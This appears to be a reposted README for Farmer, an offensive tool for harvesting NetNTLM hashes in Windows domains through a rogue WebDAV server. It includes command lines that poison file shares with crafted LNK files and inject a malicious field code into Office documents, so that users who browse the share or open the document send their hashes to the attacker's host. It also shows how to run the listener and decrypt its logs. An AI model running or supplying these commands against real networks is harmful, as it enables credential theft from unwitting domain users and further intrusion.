Farmer: collecting NetNTLM hashes in a Windows domain
Farmer
Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.
In order for Farmer to be successful, the clients MUST be able to connect to the local WebDAV server. Possible things that could prohibit this include network segmentation and/or the Windows firewall. Be sure to check these out first (hint Seatbelt WindowsFirewall).
Spreading the crop
Farmer includes a submodule for the Crop tool, this tool can be used to create LNK files that initiate a WebDAV connection when browsing to a folder where the LNK is stored as it will try and render the stored icon.
The concept of the attack is, you should use Crop to poison the desired file shares with the LNK file pointing to the Farmer WebDAV server.
For example:
crop.exe \\fileserver\Common crop.lnk \\workstation@8888\harvest \\workstation@8888\harvest
When any user browses to \fileserver\Common, the explorer will attempt to recover the icon from the Farmer WebDAV server and in doing so submit the user’s NetNTLM hash.
Fertilising the crop
Farmer includes another submodule for the Fertiliser tool, this tool can be used to poison Office documents (currently just docx) with a malicious field code. This causes the field code to be parsed when the document is opened and will leak the hash to the WebDAV server of your choice 🙂
For example:
Fertiliser.exe \\fileserver\important.docx http://workstation:8888/foo "Update required"
Farming
Farmer will listen on a user-defined port, for a number of seconds and write the output to the filesystem if required:
Usage:
farmer.exe <port> [seconds] [output]
If no seconds are specified, or its set to 0, farmer will run indefinitely, for example:
farmer.exe 8888 0 c:\windows\temp\test.tmp
To run farmer for one minute on port 8888, do the following:
farmer.exe 8888 60
If you’re wanting to write the Farmer log to the filesystem, you can AES encrypt the log file using the key set in Config.key and setting the encrypt bool to true (default false).
The log file can be decrypted with the HarvestCrop tool, for example:
harvestcrop.exe c:\windows\temp\test.tmp farmer
Download & Tutorial
Author: @domchell